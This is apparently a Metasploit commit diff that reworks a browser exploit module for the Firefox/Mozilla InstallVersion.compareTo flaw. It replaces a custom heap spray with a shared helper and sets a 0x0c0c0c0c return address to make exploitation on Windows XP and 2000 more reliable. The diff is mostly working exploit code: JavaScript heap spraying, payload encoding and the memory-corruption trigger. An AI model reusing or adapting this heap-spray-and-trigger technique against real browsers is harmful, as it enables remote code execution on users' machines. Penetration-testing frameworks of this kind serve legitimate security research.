fixes 688. better return address for greater reliability, works against FF-1.0.4 and Moz-1.7.1 on XPSP3 and 2kAS-SP0

git-svn-id: file:///home/svn/framework3/trunk@7865 4d416f70-5f16-0410-b530-b9f4589650da
2009-12-14 23:27:28 +00:00 · 2009-12-14 23:27:28 +00:00 · 0cf566c0b9
parent c799df8559
commit 0cf566c0b9
1 changed files with 11 additions and 49 deletions
--- a/modules/exploits/multi/browser/mozilla_compareto.rb
+++ b/modules/exploits/multi/browser/mozilla_compareto.rb
@ -57,16 +57,17 @@ class Metasploit3 < Msf::Exploit::Remote
 				},
 			'Targets'        =>
 				[
-					[ 'Firefox < 1.0.5 Windows', 
+					# Tested against Firefox 1.0.4 and Mozilla 1.7.1 on
+					# WinXP-SP3 and Win2kAS-SP0
+					[ 'Firefox < 1.0.5, Mozilla < 1.7.10, Windows', 
 						{
 							'Platform' => 'win',
 							'Arch' => ARCH_X86,
-							'StackAdjustment' => -3500,
-							'Addrs' => [ 0x12000000, 0x11C0002C, 0x1200002C, 0x1180002C ],
-							
+							'Ret' => 0x0c0c0c0c,
 						}
 					],
 				],
+			'DefaultTarget'  => 0,
 			'DisclosureDate' => 'Jul 13 2005'
 			))
 	end
@ -88,10 +89,10 @@ class Metasploit3 < Msf::Exploit::Remote
 		enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
 		enc_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(target.arch))
 		
-		spray_to = sprintf("0x%.8x", target['Addrs'][0])
-		spray_slide1 = Rex::Text.to_unescape( [target['Addrs'][1]].pack('V'), Rex::Arch.endian(target.arch) )
-		spray_slide2 = Rex::Text.to_unescape( [target['Addrs'][2]].pack('V'), Rex::Arch.endian(target.arch) )
-		eax_address = sprintf("0x%.8x", target['Addrs'][3])
+		spray_to = sprintf("0x%.8x", target.ret)
+		spray_slide1 = Rex::Text.to_unescape( [target.ret].pack('V'), Rex::Arch.endian(target.arch) )
+		spray_slide2 = Rex::Text.to_unescape( [target.ret].pack('V'), Rex::Arch.endian(target.arch) )
+		eax_address = sprintf("0x%.8x", target.ret)

 		return %Q|
 <html>
@ -110,45 +111,16 @@ class Metasploit3 < Msf::Exploit::Remote
 			CrashAndBurn();
 		};

+		#{js_heap_spray}
 		// The "Heap Spraying" is based on SkyLined InternetExploiter2 methodology
 		function CrashAndBurn() 
 		{
-			// Spray up to this address
-			var heapSprayToAddress=#{spray_to};
-
 			// Payload - Just return..
 			var payLoadCode=unescape("#{enc_code}");

 			// Size of the heap blocks  
 			var heapBlockSize=0x400000;
-			
-			// Size of the payload in bytes
-			var payLoadSize=payLoadCode.length * 2; 
-			
-			// Caluclate spray slides size
-			var spraySlideSize=heapBlockSize-(payLoadSize+0x38); // exclude header
-
-			// Set first spray slide ("pdata") with "pvtbl" fake address - 0x11C0002C
-			var spraySlide1 = unescape("#{spray_slide1}"); 
-
-			spraySlide1 = getSpraySlide(spraySlide1,spraySlideSize); 
-
-			var spraySlide2 = unescape("#{spray_slide2}"); //0x1200002C 
-
-			spraySlide2 = getSpraySlide(spraySlide2,spraySlideSize);
-
-			var spraySlide3 = unescape("#{enc_nops}");
-			spraySlide3 = getSpraySlide(spraySlide3,spraySlideSize);
-
-			// Spray the heap
-			heapBlocks=(heapSprayToAddress-0x400000)/heapBlockSize;
-			//alert(spraySlide2.length); return;
-			memory = new Array();
-			for (i=0;i<heapBlocks;i++) 
-			{
-				memory[i]=(i\%3==0) ? spraySlide1 + payLoadCode: 
-						(i\%3==1) ? spraySlide2 + payLoadCode: spraySlide3 + payLoadCode;
-			}
+			sprayHeap(payLoadCode, #{target.ret}, heapBlockSize - (payLoadCode.length + 0x38));

 			// Set address to fake "pdata".
 			var eaxAddress = #{eax_address};
@ -162,16 +134,6 @@ class Metasploit3 < Msf::Exploit::Remote
 			//
 			(new InstallVersion).compareTo(new Number(eaxAddress >> 1));
 		}
-
-		function getSpraySlide(spraySlide, spraySlideSize) {
-			while (spraySlide.length*2<spraySlideSize) 
-			{
-				spraySlide+=spraySlide;
-			}	
-			spraySlide=spraySlide.substring(0,spraySlideSize/2);
-			return spraySlide;
-		}
-
 // -->
 	</script>
 </head>